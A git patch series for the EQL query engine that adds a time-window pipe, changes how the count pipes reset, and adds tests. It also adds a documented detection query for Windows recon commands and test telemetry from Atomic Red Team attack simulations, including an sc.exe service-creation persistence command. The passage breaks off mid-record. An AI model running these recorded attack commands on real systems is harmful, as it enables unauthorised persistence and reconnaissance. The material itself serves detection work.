From 0bbfc10761eaf1e786cd9915d5872348c36bc6b6 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sat, 6 Jul 2019 13:19:06 +0100 Subject: [PATCH 01/13] Removed pipes dependency on the host_key. Pipes now reset their state after PIPE_EOF. Added new window pipe for time windowing streamed events. Fixed bug in walk__time_range reporting str instead of node. --- eql/ast.py | 22 +++++++++ eql/engines/native.py | 90 ++++++++++++++++--------------------- eql/etc/eql.ebnf | 1 + eql/parser.py | 2 +- setup.cfg | 2 +- tests/test_eql.py | 3 ++ tests/test_python_engine.py | 56 ++++++++++++++++++++++- 7 files changed, 122 insertions(+), 54 deletions(-) diff --git a/eql/ast.py b/eql/ast.py index a5f9762..af973cb 100644 --- a/eql/ast.py +++ b/eql/ast.py @@ -55,6 +55,7 @@ "CountPipe", "FilterPipe", "UniqueCountPipe", + "WindowPipe", # full queries "PipedQuery", @@ -1014,6 +1015,27 @@ class UniqueCountPipe(ByPipe): """Returns unique results but adds a count field.""" +@PipeCommand.register('window') +class WindowPipe(ByPipe): + """Maintains a time window buffer for streaming events.""" + + _timespan = None + + minimum_args = 1 + maximum_args = 1 + + @property + def timespan(self): + # cache timerange conversion + if not self._timespan: + self._timespan = TimeRange.convert(self.arguments[0]) + return self._timespan + + def validate(self): + if not self.timespan or self.timespan.delta < datetime.timedelta(0): + return 0 + + class PipedQuery(EqlNode): """List of all the pipes.""" diff --git a/eql/engines/native.py b/eql/engines/native.py index 519ba04..a78ccba 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py @@ -556,30 +556,23 @@ def or_terms(scope): # type: (Scope) -> bool @pipes.add(CountPipe) def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable - host_key = self.host_key if len(node.arguments) == 0: # Counting only the total summary = {'key': 'totals', 'count': 0} - hosts = set() def count_total_callback(events): if events is PIPE_EOF: - if len(hosts): - summary['total_hosts'] = len(hosts) - summary['hosts'] = list(sorted(hosts)) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + summary['count'] = 0 next_pipe(PIPE_EOF) else: summary['count'] += 1 - if host_key in events[0].data: - hosts.add(events[0].data[host_key]) return count_total_callback else: get_key = self._convert_key(node.arguments, scoped=True, piped=True) - count_table = defaultdict(lambda: {'count': 0, 'hosts': set()}) + count_table = defaultdict(lambda: {'count': 0}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: @@ -590,21 +583,15 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(tbl['count'] for tbl in count_table.values()) for key, details in sorted(converted_count_table.items(), key=lambda kv: (kv[1]['count'], kv[0])): - hosts = details.pop('hosts') - if len(hosts): - details['hosts'] = list(sorted(hosts)) - details['total_hosts'] = len(hosts) - details['key'] = key details['percent'] = float(details['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, details)]) + count_table.clear() next_pipe(PIPE_EOF) else: key = get_key(events) count_table[key]['count'] += 1 - if host_key in events[0].data: - count_table[key]['hosts'].add(events[0].data[host_key]) return count_tuple_callback @@ -630,6 +617,7 @@ def _convert_head_pipe(self, node, next_pipe): # type: (HeadPipe, callable) -> def head_callback(events): if totals[0] < max_count: if events is PIPE_EOF: + totals[0] = 0 next_pipe(PIPE_EOF) else: totals[0] += 1 @@ -648,6 +636,7 @@ def tail_callback(events): if events is PIPE_EOF: for output in output_buffer: next_pipe(output) + output_buffer.clear() next_pipe(PIPE_EOF) else: output_buffer.append(events) @@ -670,6 +659,7 @@ def get_converted_key(buffer_events): output_buffer.sort(key=get_converted_key) for output in output_buffer: next_pipe(output) + output_buffer.clear() next_pipe(PIPE_EOF) else: output_buffer.append(events) @@ -684,6 +674,7 @@ def _convert_unique_pipe(self, node, next_pipe): # type: (UniquePipe, callable) def unique_callback(events): if events is PIPE_EOF: + seen.clear() next_pipe(PIPE_EOF) else: key = get_unique_key(events) @@ -693,11 +684,37 @@ def unique_callback(events): return unique_callback + @pipes.add(WindowPipe) + @reducers.add(WindowPipe) + def _aggregate_time_window_pipe(self, node, next_pipe): # type: (WindowPipe, callable) -> callable + """Maintains a buffer of events in a specified time window and forwards all events in the buffer.""" + + window_buf = deque() # tuple of (timestamp, events) + timespan = self.convert(node.timespan) + + def time_window_callback(events): # type: (list[Event]) -> None + if events is PIPE_EOF: + next_pipe(PIPE_EOF) + else: + minimum_start = events[0].time - timespan + + # Remove any events that no longer sit within the time window + while len(window_buf) > 0 and window_buf[0][0] < minimum_start: + window_buf.popleft() + + window_buf.append((events[0].time, events)) + + # forward the entire buffer along the pipe + for result in window_buf: + next_pipe(result[1]) + next_pipe(PIPE_EOF) + + return time_window_callback + @pipes.add(UniqueCountPipe) @reducers.add(UniqueCountPipe) def _aggregate_unique_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" - host_key = self.host_key get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) results = OrderedDict() @@ -707,13 +724,9 @@ def count_unique_callback(events): # type: (list[Event]) -> None total = sum(result[0].data['count'] for result in results.values()) for result in results.values(): - hosts = result[0].data.pop('hosts') # type: set - if len(hosts) > 0: - result[0].data['hosts'] = list(sorted(hosts)) - result[0].data['total_hosts'] = len(hosts) - result[0].data['percent'] = float(result[0].data['count']) / total next_pipe(result) + results.clear() next_pipe(PIPE_EOF) else: @@ -721,56 +734,38 @@ def count_unique_callback(events): # type: (list[Event]) -> None events = [events[0].copy()] + events[1:] piece = events[0].data key = get_unique_key(events) - hosts = piece.pop('hosts', []) - host = piece.pop(host_key, None) count = piece.pop('count', 1) if key not in results: results[key] = events match = piece - match['hosts'] = set() match['count'] = count else: match = results[key][0].data match['count'] += count - if host: - match['hosts'].add(host) - else: - match['hosts'].update(hosts) - return count_unique_callback @reducers.add(CountPipe) def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" - host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - result = {'key': 'totals', 'count': 0, 'hosts': set()} + result = {'key': 'totals', 'count': 0} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - hosts = result.pop('hosts') # type: set - if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + result['count'] = 0 next_pipe(PIPE_EOF) else: piece = events[0].data result['count'] += piece['count'] - if host_key in piece: - result['hosts'].add(piece[host_key]) - elif 'hosts' in piece: - results['hosts'].update(piece['hosts']) - return count_total_aggregates else: - results = defaultdict(lambda: {'count': 0, 'hosts': set()}) + results = defaultdict(lambda: {'count': 0}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: @@ -780,23 +775,16 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(result['count'] for result in converted_results.values()) for key, result in sorted(converted_results.items(), key=lambda kr: (kr[1]['count'], kr[0])): - hosts = result.pop('hosts') # type: set - if len(hosts) > 0: - result['hosts'] = list(sorted(hosts)) - result['total_hosts'] = len(hosts) result['key'] = key result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + results.clear() next_pipe(PIPE_EOF) else: piece = events[0].data key = events[0].data['key'] key = tuple(key) if len(node.arguments) > 1 else key results[key]['count'] += piece['count'] - if host_key in piece: - results[key]['hosts'].add(piece[host_key]) - elif 'hosts' in piece: - results[key]['hosts'].update(piece['hosts']) return count_tuple_callback diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index bee7169..bd67142 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -23,6 +23,7 @@ pipe_command::Pipe pipe_arguments = + | @+:time_unit | &(atom atom) {atom} | expressions | {} diff --git a/eql/parser.py b/eql/parser.py index 11f6e06..cf402ee 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -124,7 +124,7 @@ def walk__time_range(self, node): if name.startswith(unit.rstrip('s') or 's'): return TimeRange(datetime.timedelta(seconds=val * interval)) - raise self._error(node.unit, "Unknown time unit") + raise self._error(node, "Unknown time unit") # fields def walk__field(self, node): diff --git a/setup.cfg b/setup.cfg index cd355da..f15eac5 100644 --- a/setup.cfg +++ b/setup.cfg @@ -9,4 +9,4 @@ max-complexity = 20 ignore = D203 [tool:pytest] -addopts = --cov=eql --cov-report term-missing --cov-report=xml +#addopts = --cov=eql --cov-report term-missing --cov-report=xml diff --git a/tests/test_eql.py b/tests/test_eql.py index 62ecc15..f73bc23 100644 --- a/tests/test_eql.py +++ b/tests/test_eql.py @@ -197,6 +197,7 @@ def test_valid_queries(self): 'any where true | unique a b c | sort a b c | count', 'any where true | unique a, b, c | sort a b c | count', 'any where true | unique a, b, c | sort a,b,c | count', + 'any where true | window 5s | unique a, b | unique_count a | filter count > 5', 'file where child of [registry where true]', 'file where event of [registry where true]', 'file where event of [registry where true]', @@ -274,6 +275,8 @@ def test_invalid_queries(self): 'process where true | badPipe a b c', 'process where true | head -100', 'process where descendant of []', + 'any where true | window | unique_count a, b', + 'any where true | window a | unique_count a, b', 'file where nothing of [process where true]', 'file where DescenDant of [process where true]', 'garbage', diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 2b5fc8b..4ba49ef 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -3,7 +3,7 @@ import uuid from collections import defaultdict -from eql.engines.base import Event, AnalyticOutput +from eql.engines.base import Event, AnalyticOutput, DEFAULT_TIME_UNIT from eql.engines.build import get_reducer, get_engine, get_post_processor from eql.engines.native import PythonEngine from eql.parser import parse_query, parse_analytic @@ -348,6 +348,60 @@ def test_special_pipes(self): sorted_results = list(sorted(results, key=lambda e: (e.data['count'], e.data['key']))) self.assertListEqual(sorted_results, results, "Count didn't output expected results") + def test_window_pipe(self): + def convert_time(seconds): + return int(float(seconds) * DEFAULT_TIME_UNIT) + + config = {'flatten': True} + events = [Event.from_data(d) for d in [ + { + "event_type": "process", + "process_name": "a", + "timestamp": convert_time(0) + }, + { + "event_type": "process", + "process_name": "b", + "timestamp": convert_time(1) + }, + { + "event_type": "process", + "process_name": "b", + "timestamp": convert_time(10.1) + }, + { + "event_type": "process", + "process_name": "c", + "timestamp": convert_time(11) + }, + { + "event_type": "process", + "process_name": "d", + "timestamp": convert_time(12) + }, + { + "event_type": "process", + "process_name": "e", + "timestamp": convert_time(13) + }, + { + "event_type": "process", + "process_name": "f", + "timestamp": convert_time(20.2) + }, + { + "event_type": "process", + "process_name": "a", + "timestamp": convert_time(31) + } + ]] + + query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' + results = self.get_output(queries=[parse_query(query)], config=config, events=events) + self.assertGreater(len(results), 1, "Window pipe returned no results") + self.assertListEqual([event.data['process_name'] for event in results], ['a', 'b', 'b', 'b', 'c'], "Window didn't output expected results.") + self.assertListEqual([event.data['count'] for event in results], [2, 2, 3, 4, 4], "Window didn't output expected results.") + @staticmethod def _custom_echo(x): return x From 37ee552553113a90e2cda2c0f3db3efcb74ea917 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sat, 6 Jul 2019 13:50:14 +0100 Subject: [PATCH 02/13] Fixed count pipe. Made the counter immutable. --- eql/engines/native.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/eql/engines/native.py b/eql/engines/native.py index a78ccba..48b8407 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py @@ -558,11 +558,13 @@ def or_terms(scope): # type: (Scope) -> bool def _convert_count_pipe(self, node, next_pipe): # type: (CountPipe, callable) -> callable if len(node.arguments) == 0: # Counting only the total - summary = {'key': 'totals', 'count': 0} + summary = {'count': 0} def count_total_callback(events): if events is PIPE_EOF: - next_pipe([Event(EVENT_TYPE_GENERIC, 0, summary)]) + # event must be immutable, as the counter will be reset + event = {'key': 'totals', 'count': summary['count']} + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) summary['count'] = 0 next_pipe(PIPE_EOF) else: @@ -751,11 +753,13 @@ def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" if len(node.arguments) == 0: # Counting only the total - result = {'key': 'totals', 'count': 0} + result = {'count': 0} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) + # event must be immutable, as the counter will be reset + event = {'key': 'totals', 'count': result['count']} + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) result['count'] = 0 next_pipe(PIPE_EOF) else: From 95ffe5d1d36c495427ae149c08f472fc0da1ba5f Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sat, 6 Jul 2019 14:40:42 +0100 Subject: [PATCH 03/13] Window buffer is emitted in reverse order to provide more interesting results. Added documentation for window pipe. --- docs/query-guide/pipes.rst | 21 +++++++++++++++++++++ eql/engines/native.py | 5 +++-- tests/test_python_engine.py | 23 +++++++++++++++++------ 3 files changed, 41 insertions(+), 8 deletions(-) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index 0df657a..f02574a 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -124,3 +124,24 @@ Get the top five network connections that transmitted the most data | sort total_out_bytes | tail 5 +``window`` +--------- +The ``window`` pipe will buffer events based on the timespan specify, which allows other pipes to function on a sliding +window. + +Get suspicious recon commands that were executed within a 5 minute window + + .. code-block:: eql + + process where process_name in ("whoami.exe", "netstat.exe", "hostname.exe", "net.exe", "sc.exe", "systeminfo.exe") + | window 5m + | unique hostname, process_name + | unique_count process_name + | filter count >= 3 + +.. note:: + + The window buffer will emit the most recent event first, as this will provide a stream of events when using + ``unique`` pipe or ``unique_count`` pipe. However, this means when using ``filter`` pipe in the example above, + the first few events may be absent, e.g. ``filter count >= 3`` will not show the first two events in the output + results. diff --git a/eql/engines/native.py b/eql/engines/native.py index 48b8407..7cdca45 100644 --- a/eql/engines/native.py +++ b/eql/engines/native.py @@ -706,8 +706,9 @@ def time_window_callback(events): # type: (list[Event]) -> None window_buf.append((events[0].time, events)) - # forward the entire buffer along the pipe - for result in window_buf: + # forward the entire buffer along the pipe, reversed so that events[0] exposes new information for + # unique pipe etc + for result in reversed(window_buf): next_pipe(result[1]) next_pipe(PIPE_EOF) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 4ba49ef..626641e 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -372,21 +372,21 @@ def convert_time(seconds): { "event_type": "process", "process_name": "c", - "timestamp": convert_time(11) + "timestamp": convert_time(11.1) }, { "event_type": "process", - "process_name": "d", + "process_name": "c", "timestamp": convert_time(12) }, { "event_type": "process", - "process_name": "e", + "process_name": "d", "timestamp": convert_time(13) }, { "event_type": "process", - "process_name": "f", + "process_name": "e", "timestamp": convert_time(20.2) }, { @@ -396,11 +396,22 @@ def convert_time(seconds): } ]] + ''' + 0: [a] + 1: [a,b] + 10.1: [b] + 11.1: [b,c] + 12: [b,c,c] + 13: [b,c,c,d] + 20.2: [c,c,d,e] + 31: [a] + ''' + query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' results = self.get_output(queries=[parse_query(query)], config=config, events=events) self.assertGreater(len(results), 1, "Window pipe returned no results") - self.assertListEqual([event.data['process_name'] for event in results], ['a', 'b', 'b', 'b', 'c'], "Window didn't output expected results.") - self.assertListEqual([event.data['count'] for event in results], [2, 2, 3, 4, 4], "Window didn't output expected results.") + self.assertListEqual([event.data['process_name'] for event in results], ['b', 'c', 'c', 'd', 'e'], "Window didn't output expected results.") + self.assertListEqual([event.data['count'] for event in results], [2, 2, 2, 3, 3], "Window didn't output expected results.") @staticmethod def _custom_echo(x): From dc1d525b2844ec64d32aedab3cd010740197116b Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 10 Sep 2019 14:09:40 +0100 Subject: [PATCH 04/13] Added test data --- tests/test_data.json | 159601 +++++++++++++++++++++++++++++++++++++++- 1 file changed, 159600 insertions(+), 1 deletion(-) diff --git a/tests/test_data.json b/tests/test_data.json index 0637a08..71fa9ea 100644 --- a/tests/test_data.json +++ b/tests/test_data.json @@ -1 +1,159600 @@ -[] \ No newline at end of file +[ + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", + "registry_value": "W32:0000000000050566", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000050566\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883570659490000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570670110000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570670270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883570685280000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883570685430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", + "registry_value": "W32:0000000000080582", + "timestamp": 131883570686060016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000080582\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883570686060016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 1500, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "terminate", + "timestamp": 131883570696220000, + "unique_pid": "{42FC7E13-C965-5C05-0000-001028424901}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570715590000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1480, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570844660000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1480, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-001074C14C01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570844650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8148, + "ppid": 1480, + "process_name": "sc.exe", + "process_path": "C:\\Windows\\System32\\sc.exe", + "subtype": "create", + "timestamp": 131883570844800000, + "unique_pid": "{42FC7E13-CADC-5C05-0000-0010BAC24C01}", + "unique_ppid": "{42FC7E13-CADC-5C05-0000-001074C14C01}", + "user": 